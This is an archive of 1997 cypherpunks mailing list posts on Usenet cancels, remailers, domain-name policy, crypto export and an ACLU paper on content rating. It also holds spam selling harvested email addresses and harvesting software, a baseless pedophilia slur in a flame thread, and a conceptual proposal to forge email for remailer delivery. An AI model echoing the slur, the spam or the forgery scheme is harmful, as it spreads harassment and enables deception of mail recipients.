Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From dlv at bwalk.dm.com  Thu Aug  7 19:22:10 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 7 Aug 1997 19:22:10 -0700 (PDT)
Subject: forged cancels (Re: Entrust Technologies's Solo - free
In-Reply-To: <19970807173814.48963@bywater.songbird.com>
Message-ID: 


Kent Crispin  writes:

> On Thu, Aug 07, 1997 at 12:53:16PM -0700, Ross Wright wrote:
> [...]
> >
> > For no reason whatsoever should you cancel a message you did not send
> > yourself.

Yep.

> How about if it is an employee of yours, using your computer
> equipment, that sent the message, in explict contradition to your
> companies stated policy?

Use a retraction server (David's project)

> How about if it is your 5 year old child who
> just sent a 5 megabyte spam to 500 groups?

Ditto.

> What if the message is
> forged in such a way that it looks exactly as if it came from you?

Ditto, and consider setting up a service to automatically issue NoCeMs
for forgeries.

> What if the sender asks you to cancel it because they don't know how?

Make the retraction server easier to use.

> Absolutist thinking is *almost* always wrong :-)

kent Crispin sounds like a pedophile.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From info at pgmedia.net  Thu Aug  7 19:26:25 1997
From: info at pgmedia.net (pgMedia)
Date: Thu, 7 Aug 1997 19:26:25 -0700 (PDT)
Subject: Petition US Dept. of Commerce in support of NAME.SPACE
Message-ID: <1341134534-1071285@MediaFilter.org>


Hello All!

The US Department of Commerce is soliciting
comments on the future of domain names on the
internet.

We here at name.space believe that we have designed and
implemented the most all encompassing solution for the good
of the internet and in the interest of the public and free
enterprise.

This is a call to action in support of NAME.SPACE...

Please go to:

http://petition.name.space.xs2.net

and "sign" the petition with your name and email
address, then submit the form to the mailbot who
will send it along to the US Department of Commerce.

For those who choose to write their personal views,
or otherwise comment on the name.space petition,
please use the optional doit yourself form linked to
from the petition page.  All individual comments will
be emailed to USDoC as well as be posted on the public
forum on the NAME.SPACE website.

Please take this time to make your voices heard!

DEADLINE FOR COMMENTS IS AUGUST 18, 1997
so please don't wait! time is running out.

For a preview, the full text of the petition appears below.
If you know people who lack web access, please pass it along
so they may participate via email.  Such submissions should
be sent to dns at ntia.doc.gov

Please take a few moments to review the contents of the
petition and please, do pass this info on to as many people
as possible.

Thank you for your time and for your support.

Best Wishes,

Paul Garrin
name.space
http://name.space
http://namespace.xs2.net

----------------------full text of petition follows------------------

       PETITION TO THE US DEPARTMENT OF COMMERCE IN SUPPORT OF
       THE NAME.SPACE(TM) SYSTEM OF GLOBAL DIRECTORY SERVICES

                   (The New Paradigm for the Old DNS)

I [YOUR NAME WILL BE INSERTED] do hereby support the design of the
expanded toplevel Internet namespace which is currently operated by
pgMedia, Inc.'s NAME.SPACE(TM) service, located on the internet at
http://namespace.pgmedia.net (or http://name.space).

The paradigm implemented by NAME.SPACE(TM) is the most
pro-competitive, democratic and open system proposed so far with
respect to opening up the administration and operation of the
Domain-Name-System ("DNS"). The structure advocated by NAME.SPACE(TM)
removes the artificial barriers to entry that exist today as a result of
the monopolistic control over the domain name registration market
exerted by Network Solutions, Inc. ("NSI"). The NAME.SPACE(TM) paradigm
incorporates a fair, competitive structure which encourages
investment and innovation by companies wishing to compete in the
provision of this service which is essential to the operation and
continued growth of the Internet.

pgMedia, Inc. has created, through substantial private investment in
research and development, its NAME.SPACE(TM) registry administered by
thirteen toplevel root-directory servers located in five countries. The
NAME.SPACE(TM) registry uses innovative and creative techniques which
bring the old DNS out of the Cold War and into The 90'S.

The NAME.SPACE(TM) system decentralizes the administration of DNS and
enables open competition in the Public Domain Toplevel Namespace
without regulation by any governments or quasi-governmental
authority, nor does it require the enactment of new laws or regulations.

Description of the NAME.SPACE(TM) service:

On the NAME.SPACE(TM) system, name registrations are taken by
registrars who administer client accounts under the given toplevel
name categories (publicly shared toplevel namespace). All registrars
must register their digital ID with a trusted third party/parties which
authenticates and authorizes them to function as registries. The
application process is administered by an independent company, similar
to the process used by banks when authorizing merchant credit-card
accounts, and the operation of secure servers used in commercial
transactions on the Internet today.

Registries update the database on demand based on the availability of a
given name address using the IDSD system (IDSD=Integral Database
Synchronizer Daemon), a secure protocol developed by pgMedia which is
available, without limitation or charge. (A detailed description of the
IDSD protocol can be found at http://namespace.xs2.net/IDSD). IDSD
makes it technically feasible for ALL registries to share the toplevel
namespace equally, eliminating any technical justification for
"exclusive" control over any given toplevel name by a single registry,
such as NSI currently enjoys with ".com".

Registration is accomplished instantaneously through an interactive,
form-based interface on the World Wide Web with online payment
options via a secure server. During the registration process, a
registrant establishes an account, a contact "handle" and, of course its
"name". The registrant has the option to choose whether or not its
personal contact information will be publicly listed. All other account
information, of course, remains confidential. The registrant may then
establish a Portable Address Record, over which it has full
administrative access on the NAME.SPACE nameservers. This service
allows a registrant to change service providers and easily take its
"name" to a new host without delay or complications. Upon completion
of the registration process by the registrant, the NAME.SPACE(TM) system
immediately processes the information and creates the second level
entry into the toplevel database, which is then distributed to all other
root-servers via the IDSD protocol. The registration process and the
creation of Portable Address Records are instantaneous, and function
on the Internet within minutes, not days or weeks as in the current
system.

Issues and Answers

Under the NAME.SPACE(TM) paradigm, the toplevel namespace functions as
a Global Directory Service and would be managed within the
competitive marketplace in the general interest of the Internet public
through the various independent registrars. Each generic TLD ("gTLD") is
administered by all registrars who wish to offer services thereunder
with no exclusive claim of ownership of any toplevel name by any
individual, corporation or government, subject to existing intellectual
property law.

These gTLDs may be added or removed based on public demand. Also,
gTLDs may include languages other than English, limited only to the US
ASCII character set, the English alphabet plus 10 digits and the hyphen
for a total of 37 characters.

All leading authorities are in agreement that there is no limit to the
number of possible toplevel names, as there is no limit to the number
of root directories under the UNIX file system. As NSI admits:

"DNS is highly scaleable. There is no technical limit to the number of
new top-level names that could be introduced. The original designer of
DNS, Paul Mockapetris, has verified the scalability of DNS."

(http://rs.internic.net/nic-support/nicnews/jun97/MYTHS4.html)

Thus, any claim that expanding the toplevel namespace is technically
not feasible is simply unfounded. The proponents of such claims seem
to be guided by a desire to limit the potential market so as to create an
artificial scarcity which translate into higher prices and profits.

The use of arbitrarily defined and limited categories such as ".com" has
forced many registrants to engage in verbal gymnastics, and to rely on
unwieldy content-based search engines - this would be obviated by the
full implementation of the NAME.SPACE(TM) paradigm. Thus, for example,
Acme.computers and Acme.plumbing could both have a presence on the
Internet without having to artificially pervert their names. The
"byte-counter mentality," which has plagued us with the dreaded
"Millennium Bug," was responsible for the initial constraints on the
toplevel domain name nomenclature. The NAME.SPACE(TM) system simply
recognizes that such limitations have long since been eliminated and
are wholly artificial.

With respect to intellectual property issues, no regulatory framework
can assure the complete protection of holders of such rights against
infringement by unauthorized parties. However, the potential for such
infringement, which exists in all published media, should not be used as
a basis to limit the free speech rights of the vast majority of law
abiding users of the Internet, while protecting artificial monopolies.
Furthermore, it is wholly inappropriate to empower any registrar to
adjudicate the rights of holders of intellectual property, for that role
must ultimatly reside with the courts.

Fees for registration services should be dictated by the market. Waiver
of fees and discounts should be considered for qualifying educational
and non-profit organizations, as well as a selection of totally free
categories (such as the Free.Zone provided currently by NAME.SPACE(TM)).

In conclusion, NAME.SPACE(TM) has developed and implemented a new
paradigm for the Global Directory Services on the Internet by bringing
the function of the old DNS, a legacy of the Cold War, into sync with the
current dynamic of the public, global, civilian and commercial Internet.

The NAME.SPACE(TM) system is a reality today. The NAME.SPACE(TM)
automated registry has been fully functional for nearly one year now
and has proven its reliability and desirability as evidenced by the
thousands of users who have been using the NAME.SPACE(TM) servers to
resolve their DNS and those who have registered their names in
NAME.SPACE(TM) .

I fully endorse and support the endeavors of pgMedia, Inc. and the
NAME.SPACE(TM) system and highly recommend that the U.S. Department of
Commerce recommend and concur in its full implementation on the
Internet.







From jmatk at tscm.com  Thu Aug  7 20:27:55 1997
From: jmatk at tscm.com (James M. Atkinson, Comm-Eng)
Date: Thu, 7 Aug 1997 20:27:55 -0700 (PDT)
Subject: Bugs Recently Found in Department of Energy Facilities
Message-ID: 

A non-text attachment was scrubbed...
Name: not available
Type: text/enriched
Size: 6687 bytes
Desc: not available
URL: 

From mpj at ebible.org  Thu Aug  7 20:50:13 1997
From: mpj at ebible.org (Michael Paul Johnson)
Date: Thu, 7 Aug 1997 20:50:13 -0700 (PDT)
Subject: Death of the North American Crypto archive?
Message-ID: <3.0.3.32.19970807212752.00931870@teal.csn.net>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Alas, it wasn't government regulation.
It wasn't patent entanglements.
It wasn't spooks.
It is economics. Can anyone suggest an alternate host that might provide room 
for a few hundred megabytes of ftp access for free (or nearly free)? Can 
someone else in North American mirror all of that data, quickly, before the 
site shuts down?

I really don't want to shut http://www.sni.net/~mpj/crypto.htm down, but I 
don't want to face the bills alone...


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBM+qSN0SP4McX10e7EQKAagCg0qQJTkunB3KZpwtiH00epx01xEoAnix0
2KdLJaN3VKsG6P9mSeZtUXiJ
=WMhh
-----END PGP SIGNATURE-----


Michael Paul Johnson    mailto:mpj at ebible.org (aka mpj at csn.net)
PO Box 1151             http://www.ebible.org/bible        <- Holy Bible
Longmont CO 80502-1151  http://www.sni.net/~mpj/crypto.htm <- Crypto archive
USA       

PGP RSA key fingerprint (mpjA): 3E67 A580 0DFB D16A  6D52 D3A9 1C07 4E41

PGP DSS/DH fingerprint: 28AE B775 DD65 62C7 0717  ECDA 448F E0C7 17D7 47BB









From kent at songbird.com  Fri Aug  8 00:44:30 1997
From: kent at songbird.com (Kent Crispin)
Date: Fri, 8 Aug 1997 00:44:30 -0700 (PDT)
Subject: forged cancels (Re: Entrust Technologies's Solo - free
In-Reply-To: <19970807173814.48963@bywater.songbird.com>
Message-ID: <19970808003832.21296@bywater.songbird.com>


On Thu, Aug 07, 1997 at 10:00:25PM -0500, Dr.Dimitri Vulis KOTM wrote:
> Kent Crispin  writes:
> 
> > On Thu, Aug 07, 1997 at 12:53:16PM -0700, Ross Wright wrote:
> > [...]
> > >
> > > For no reason whatsoever should you cancel a message you did not send
> > > yourself.
> 
> Yep.
> 
> > How about if it is an employee of yours, using your computer
> > equipment, that sent the message, in explict contradition to your
> > companies stated policy?
> 
> Use a retraction server (David's project)

Just curious -- how would this be morally different from doing a
cancel?

[...]

> kent Crispin sounds like a pedophile.

You need to get your hearing checked, then.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From dformosa at st.nepean.uws.edu.au  Fri Aug  8 07:24:50 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Fri, 8 Aug 1997 07:24:50 -0700 (PDT)
Subject: forged cancels (Re: Entrust Technologies's Solo - free
In-Reply-To: <199708071951.MAA21851@adnetsol.adnetsol.com>
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 7 Aug 1997, Ross Wright wrote:

> For no reason whatsoever should you cancel a message you did not send 
> yourself.

I have issued cancels for posts issued (mistankely) from a group account.
I have also issued cancels (with there permition) for authours who
couldn't work out how to do it.

> NPR's Jim Zarroli reports that UUNet, the Internet service provider
> whose billboards were blocked,

Please don't call UseNet a billboard.  Its like calling the interantional
phone system an intercom.

- --
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+ryKaQK0ynCmdStAQGoKAQA0WTGtylmuAgD3VYwY5+Gw51Q90N2B0Rl
X4Jg8zgpPBoU/VYyUPJixTHCCne30fp3SXXaYYYWIMnjWHxrO+Zs2TSfl7EqCsWg
M83gu/0vKfS9/x7tKQkZrMDW8Huti86X7GHmamfRVynRLm3oPb/r9DhzS47+dvBk
+AlVmczX2/M=
=UHQV
-----END PGP SIGNATURE-----






From name1 at msn.com  Fri Aug  8 07:36:13 1997
From: name1 at msn.com (name1 at msn.com)
Date: Fri, 8 Aug 1997 07:36:13 -0700 (PDT)
Subject: You wanted it - YOU GOT IT !!!
Message-ID: <199702170025 GAA08086 @emyn46.mail.aol.com>


OK, here it is:

45,000,000+  Yep that's right, FORTY FIVE MILLION PLUS
E-Mail addresses on 2 CD's.  Your Cost $119.00 plus
$5.00 for shipping and handling.

Want them overnight add $15.00

These are brand new names, with no duplicates, in text format
for easy use with your Bulk E-mail software programs.

Order now - will not last long at this price only taking limited
orders as we do not want to saturate the market with these names.

Send  Check or Money Order Only - (No Cash) to:

HPC
(702) 454-2563
2887 North Green Valley Parkway
Suite # 298
Henderson , Nevada 89014

Name ______________________________________________
Address_____________________________________________
City _____________________ State _______ Zip ___________
Email Address _______________________________________





_____ Send me the 45,000,000 Email addresses for  $119.00
           plus $5.00 shipping and handling (total $124.00)

_____ Send me the 45,000,000 Email addresses for $119.00
           plus $5.00 for shipping and handling and $15.00 for
           overnight service (total $139.00)

Make all checks and Money Orders payable to : "HPC"

(Checks held 5 business days)

(please print this order form) 












Hpc/897 






From extractor at impactmarketing.com  Fri Aug  8 14:36:00 1997
From: extractor at impactmarketing.com (extractor at impactmarketing.com)
Date: Fri, 8 Aug 1997 14:36:00 -0700 (PDT)
Subject: Never Pay for Advertising Again.
Message-ID: <199708082135.OAA12177@toad.com>


Since you are doing business on the 'net, you know that properly
targeting your advertising messages can be pretty tough.  And banner
ads are still way too expensive

Instead of paying for "impressions" to a general audience, wouldn't
you rather know that you sent your message directly to the appropriate
audience?

US World News & Reports came out with an article on Monday May 12,
1997 finding that  "70% of Internet users don't mind receiving
commercial email messages - as long as they are targeted to their
personal interests"

I found that you are doing business on the net by using "Extractor
PRO" commercial email software.  You, too, can send commercial
e-mail to those who are interested in what you have to offer,
whatever it is - and it's so inexpensive!

Once you own the software, you can build your very own Highly Targeted 
Mailing List, then send your ad out to your targeted mailing list at the push 
of a button.


"You may never have to pay for other forms of advertising again!"

"HotWired" Magazine says, "Extractor Pro simplifies the process of
gathering and managing email addresses from AOL, Usenet, mailing
lists, and other public sources."  Feb. 11, 1997


Extractor PRO is loaded with targeting power, high-speed, a
user-friendly feel, Online Wizards, Smart Help and Awesome Video
Training via "CyberSchool".  No other commercial email software is as
easy to use and understand.  Extractor PRO really makes advertising
economical. 

Just check out the website - you'll be impressed!  With your order
before Aug. 15, 1997 you'll also receive a free website submission
service, World Launch - we'll submit your website to over 200 of the
hottest search engines, and also offer you 2000 Free Classified Sites
AND Free powerful tips to get your site noticed by the search engines!
 ($40 value)

For more information, simply point your WebBrowser to:

http://www.impactmarketing.com
http://www.e-offers.com

Click here to download our movie!
http://www.extractor.com/demo.exe

Thank you for your time.

------------------
To be removed from this business list, simply reply to this message
with the word, "Remove" in the subject heading, and Extractor PRO will
automatically remove you from the list.






From jsmith58 at hotmail.com  Fri Aug  8 00:34:55 1997
From: jsmith58 at hotmail.com (John Smith)
Date: Fri, 8 Aug 1997 15:34:55 +0800
Subject: "Voluntary Censorship" vs. Govt Legislation
Message-ID: <19970808062547.28652.qmail@hotmail.com>



Ryan Anderson writes:
>The second thing, and most important, is that web search engines need 
>to
>index *every* page, and allow the topical/categorization system as a 
>way
>to further limit searchs.  

You can't make the web search engines do that.  It's a free country.

What you can do is to avoid the ones which have policies you don't
like.  If Altavista starts listing only rated sites, you can use a
different search engine.

Realistically, the percentage of rated sites is probably going to
stay low for some time.  The big ones will rate, though.  So the
question will be whether most people are happy with the "top 1%"
sites, or whether they want access to the whole web.

It seems to me that if you are using a search engine, you probably
need access to more than just the big commercial sites.  Rogue
indexes which don't block unrated sites may have an advantage just
in terms of usefulness, even aside from the politics.

"John

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com






From azur at netcom.com  Fri Aug  8 00:35:13 1997
From: azur at netcom.com (Steve Schear)
Date: Fri, 8 Aug 1997 15:35:13 +0800
Subject: Export Tax vs ITAR as a compromise ...
In-Reply-To: <199708072032.NAA20409@ohio.chromatic.com>
Message-ID: 



At 7:10 PM -0700 8/7/97, Marshall Clow wrote:
>If this were in force, and I were someone like, say, PGP,
>I would export a single copy of my program to a confederate
>overseas who would then duplicate it and sell it abroad,
>sending royalty payments back to me.
>
>25% of $50 is um... $12.50.

Once the PGP 5.0 listing have been OCR's and placed on Net, I'd be very
surprised if PGP didn't announce an offshore commercial licensing and
distribution agreement.  PGP may have published their source code, but they
have not ceded their copyrights or use of their trademarks.

--Steve







From azur at netcom.com  Fri Aug  8 00:35:19 1997
From: azur at netcom.com (Steve Schear)
Date: Fri, 8 Aug 1997 15:35:19 +0800
Subject: Postal remailers? (was Re: anti-spam law implies laws againstremailers?)
In-Reply-To: <199708061705.SAA03362@server.test.net>
Message-ID: 



>Nor are delivery services required to "know their customer" or to have
>ironclad proof of where a package originated. (Hell, even the U.S. Postal
>Service allows mail with no valid return address, and this was my
>experience in Europe as well.)

As an aside are there any anonymous postal remailers?  If not, it might be
interesting to set them up.  Maybe you could include a diskette with the
'nested' remailer information now used on Net and ecash payments at each
layer of the 'onion'.  Users would be encouraged to use uniform box
dimensions, wrapping and weight (via liquid 'filler weights) to thwart
traffic analysis.

--Steve

--Steve







From tcmay at got.net  Fri Aug  8 00:36:07 1997
From: tcmay at got.net (Tim May)
Date: Fri, 8 Aug 1997 15:36:07 +0800
Subject: Shor's Algorithms: Mad, Bad and Dangerous (fwd)
In-Reply-To: <199708080232.VAA08939@einstein.ssz.com>
Message-ID: 



At 7:32 PM -0700 8/7/97, Jim Choate wrote:

>The Many Worlds Hypothesis was developed by David Bohm and is an alternate
>way of looking at the Uncertaintly Principle, which gets its origin from the
>collapse of wave functions used to describe the potential states of a wave.

I would give credit to Hugh Everett, a student of John Wheeler's, for
developing this interpreation. In fact, the Many Worlds interpretation is
also called the Everett-Wheeler-Graham Interpretation. This was back in
1956-7.


ObCrypto Significance: Zero, in all worlds of the Multiverse

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From dlv at bwalk.dm.com  Fri Aug  8 00:36:15 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 8 Aug 1997 15:36:15 +0800
Subject: Query on cookies
In-Reply-To: 
Message-ID: 



Declan McCullagh  writes:

> I believe this is what the folks at Netscape tried to eliminate in 4.0,
> which I'm told features four cookie settings. One rejects "third party
> cookies."

Blessed are those who believe.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From ravage at ssz.com  Fri Aug  8 00:36:15 1997
From: ravage at ssz.com (Jim Choate)
Date: Fri, 8 Aug 1997 15:36:15 +0800
Subject: Shor's Algorithms: Mad, Bad and Dangerous (fwd)
Message-ID: <199708080604.BAA09505@einstein.ssz.com>



Forwarded message:

> Date: Thu, 7 Aug 1997 22:53:28 -0700
> From: Tim May 
> Subject: Re: Shor's Algorithms: Mad, Bad and Dangerous (fwd)

> >The Many Worlds Hypothesis was developed by David Bohm and is an alternate
> >way of looking at the Uncertaintly Principle, which gets its origin from the
> >collapse of wave functions used to describe the potential states of a wave.
> 
> I would give credit to Hugh Everett, a student of John Wheeler's, for
> developing this interpreation. In fact, the Many Worlds interpretation is
> also called the Everett-Wheeler-Graham Interpretation. This was back in
> 1956-7.

D. Bohm     Phys. Rev., 85, 166-193 (1952)

D. Bohm     Phys. Rev., 89, 458-466 (1953)

D. Bohm     Quantum Theory, Prentice-Hall, Englewood Cliffs, New Jersey,
1951

L. de Broglie, Electrons et Photons, Rapport au Ve Conseil Physique Solvay,
Gauthier-Viliars, Paris, 1930

H. Everett  Rev. Mod. Phys. 29, 454-462 (1957)

W. Pauli, in Reports on the 1927 Solvay Congress, Gauthiers-Villiars,
et Cie, Paris (1928), 280

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From dlv at bwalk.dm.com  Fri Aug  8 00:37:47 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 8 Aug 1997 15:37:47 +0800
Subject: Qualcomm employee attacks the remailers
In-Reply-To: <3.0.16.19691231190000.4a57c97e@pop.netaddress.com>
Message-ID: 



Casey Iverson  writes:

> At 10:37 PM 8/6/97 EDT, The Anti American, KGB loving  bucket of animal
> dung and human excrement :
>  Dr.Dimitri Vulis KOTM wrote the following, and again the master of
> disinformation and  harassing e-mail, points
> out that others are targeting him for the abuses that he is famous for.

Qualcomm employee Paul Pomes, who harrasses anonymous remailer operators
and complains to their employers and upstreams, deserves no mercy.

> Are we expected to have sympathy for this dick brain?

Pathological liar Paul Pomes deserves no sympathy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From aba at dcs.ex.ac.uk  Fri Aug  8 00:37:56 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Fri, 8 Aug 1997 15:37:56 +0800
Subject: disposable remailers (was Re: Eternity Uncensorable?)
In-Reply-To: 
Message-ID: <199708080147.CAA00946@server.test.net>




Andy Dustman  writes:
> 
> Back to the subject: Disposable remailers. It seems the juno remailer
> software would be good for this. I'm not sure what the sign-up requirement
> are, but it's free. I was also thinking about web-based free mail
> services, such as Hotmail and Rocketmail. Receiving mail means having to
> parse some HTML, which from the looks of things is do-able but not
> trivial. Sending mail might be easier to implement.

Sending mail is your problem alright.  It's where you get hit by
spammers etc.

Wasn't there an email forgery web page around for a while.  The idea
was that you filled in the details of who you wanted to send to, what
address you wanted it to appear you had sent it from, and paste your
message in this form box.  It did some kind of crude sendmail forgery
for you.

> Which brings up an interesting idea for an exitman/middleman remailer: Use
> a nym or commercial ISP to receive the mail, use throwaway free mail
> accounts for delivery (maybe even just plaintext delivery). Hotmail, at
> least, inserts an X-Originating-IP:  header, though.  

No problem -- run it through www.anonymizer.com first :-)

> I expect others do the same. So put your remailer output on a ZIP
> disk or floppy and run your delivery on whatever public or
> semi-public access machine you happen to get your hands on, once or
> twice a day.

You'd not want to use the same public access account regularly.

I think the connecting to the web based interface of one of those free
web gateways via www.anonymizer.com web based interface has potential.

However I wonder how long it will last...  I mean rocket mail or
whatever admins are going to get complaints like you do as a remailer
operator.

If it gets bad, they'll do what?  Not sure -- yank your account?  You
could get another one...

Turn the whole thing off?

Might last for a while.

Really we could do with some more general distributed solution to the
delivery problem.

Email forgeries seem like an interesting solution, either via an
exitman remailer which is basically just an email forging service, or
perhaps we could add capability "forger" to the remailer code.

How much trouble can you get in with ISPs for forging email?  Do they
care?  Would wide-spread practice of forging to avoid getting spammed
in USENET would cover you well enough?  How much extra security would
it give you?  Probably quite a lot -- the sorts of person who gets
spam baited is clueless almost by definition, and won't have a clue
where the mail came from.  Unless they enlist some technical help,
they'll be forced to just discard the email.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0





---------- Forwarded message ----------
Date: Thu, 7 Aug 1997 22:18:06 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship-announce at vorlon.mit.edu
Subject: Fahrenheit 451.2: Is Cyberspace Burning? -- ACLU on labeling


----

http://www.aclu.org/issues/cyber/burning.html

                               Cyber-Liberties
                                      
                             Fahrenheit 451.2:
                           Is Cyberspace Burning?
                                      
                     How Rating and Blocking Proposals
                   May Torch Free Speech on the Internet
                                      
     Executive Summary
     Introduction
     Is Cyberspace Burning?
     Free Speech Online: A Victory Under Siege
     Rethinking the Rush to Rate
     Recommendations and Principles
     Six Reasons Why Self-Rating Schemes Are Wrong
     Is Third-Party Rating the Answer?
     The Problems With User-Based Blocking Software in the Home 
     Why Blocking Software Should Not Be Used by Public Libraries
     Conclusion
     Appendix: Internet Ratings Systems  How Do They Work?
     
       ______________________________________________________________
                                      
     Fahrenheit 451.2: Is Cyberspace Burning?
     How Rating and Blocking Proposals May Torch Free Speech on the
     Internet 
     
    Executive Summary
    
     
     In the landmark case Reno v. ACLU, the Supreme Court overturned the
     Communications Decency Act, declaring that the Internet deserves
     the same high level of free speech protection afforded to books and
     other printed matter.
     
     But today, all that we have achieved may now be lost, if not in the
     bright flames of censorship then in the dense smoke of the many
     ratings and blocking schemes promoted by some of the very people
     who fought for freedom.
     
     The ACLU and others in the cyber-liberties community were genuinely
     alarmed by the tenor of a recent White House summit meeting on
     Internet censorship at which industry leaders pledged to create a
     variety of schemes to regulate and block controversial online
     speech.
     
     But it was not any one proposal or announcement that caused our
     alarm; rather, it was the failure to examine the longer-term
     implications for the Internet of rating and blocking schemes.
     
     The White House meeting was clearly the first step away from the
     principle that protection of the electronic word is analogous to
     protection of the printed word. Despite the Supreme Court's strong
     rejection of a broadcast analogy for the Internet, government and
     industry leaders alike are now inching toward the dangerous and
     incorrect position that the Internet is like television, and should
     be rated and censored accordingly.
     
     Is Cyberspace burning? Not yet, perhaps. But where there's smoke,
     there's fire.
     
[...]
     
    Conclusion
    
     The ACLU has always favored providing Internet users, especially
     parents, with more information. We welcomed, for example, the
     American Library Association's announcement at the White House
     summit of The Librarian's Guide to Cyberspace for Parents and Kids,
     a "comprehensive brochure and Web site combining Internet
     terminology, safety tips, site selection advice and more than 50 of
     the most educational and entertaining sites available for children
     on the Internet."
     
     In Reno v. ACLU, we noted that Federal and state governments are
     already vigorously enforcing existing obscenity, child pornography,
     and child solicitation laws on the Internet. In addition, Internet
     users must affirmatively seek out speech on the Internet; no one is
     caught by surprise.
     
     In fact, many speakers on the Net provide preliminary information
     about the nature of their speech. The ACLU's site on America
     Online, for example, has a message on its home page announcing that
     the site is a "free speech zone." Many sites offering commercial
     transactions on the Net contain warnings concerning the security of
     Net information. Sites containing sexually explicit material often
     begin with a statement describing the adult nature of the material.
     Chat rooms and newsgroups have names that describe the subject
     being discussed. Even individual e-mail messages contain a subject
     line.
     
     The preliminary information available on the Internet has several
     important components that distinguish it from all the ratings
     systems discussed above: (1) it is created and provided by the
     speaker; (2) it helps the user decide whether to read any further;
     (3) speakers who choose not to provide such information are not
     penalized; (4) it does not result in the automatic blocking of
     speech by an entity other than the speaker or reader before the
     speech has ever been viewed. Thus, the very nature of the Internet
     reveals why more speech is always a better solution than censorship
     for dealing with speech that someone may find objectionable.
     
     It is not too late for the Internet community to slowly and
     carefully examine these proposals and to reject those that will
     transform the Internet from a true marketplace of ideas into just
     another mainstream, lifeless medium with content no more exciting
     or diverse than that of television.
     
     Civil libertarians, human rights organizations, librarians and
     Internet users, speakers and providers all joined together to
     defeat the CDA. We achieved a stunning victory, establishing a
     legal framework that affords the Internet the highest
     constitutional protection. We put a quick end to a fire that was
     all but visible and threatening. The fire next time may be more
     difficult to detect  and extinguish.
[...]
    Credits
    
     The principal authors of this white paper are Ann Beeson and Chris
     Hansen of the ACLU Legal Department and ACLU Associate Director
     Barry Steinhardt. Additional editorial contributions were provided
     by Marjorie Heins of the Legal Department, and Emily Whitfield of
     the Public Education Department. This report was prepared by the
     ACLU Public Education Department: Loren Siegel, Director; Rozella
     Floranz Kennedy, Editorial Manager; Ronald Cianfaglione, Designer.
     
             Copyright 1997, The American Civil Liberties Union









From andy at CCMSD.chem.uga.edu  Fri Aug  8 00:38:18 1997
From: andy at CCMSD.chem.uga.edu (Andy Dustman)
Date: Fri, 8 Aug 1997 15:38:18 +0800
Subject: disposable remailers (was Re: Eternity Uncensorable?)
In-Reply-To: <199708072250.XAA05978@server.test.net>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 7 Aug 1997, Adam Back wrote:

> Wasn't there for a time a hidden middleman.  That is a middleman
> remailer who's published address was a nym account on a nymserver?
> That'd be a "hidden middleman".

There's some now. medusa at squirrel.owl.de is one.  middleman at cyberpass.net
(reno) might be another (not sure the account is anonymous, but could be).

> Dimitri suggested on cypherpunks in the last round of discussion of
> this sort of thing another variation on that -- that you could deliver
> the mail if the person had a PGP public key on the keyservers --
> whether the email was encrypted or not.  On the assumption that people
> who use PGP would be unlikley to complain of anonymous mail.

The only problem with that is the denial-of-service attack you describe
below. I figure if it's already encrypted, delivery is likely to be
welcomed rather than irritating.

> He also suggested beefing up keyserver submission checks (there are
> none right now) so that you need a replyable address to submit a key,
> otherwise the remailer-baiter just posts a key generated with their
> "victim's" email address on it prior to sending to them.

Yeah, I had in mind some kind of magic cookie exchange using the submitted
key. Once the cookie gets returned, the keyserver signs the key with a
special signing key which certifies that the key has at least passed the
"cookie exchange" test. The remailer I was working on (I say "was" because
I just have been too darn busy to finish it) would have implemented that
very thing. It's essentially the same thing the nymservers do when
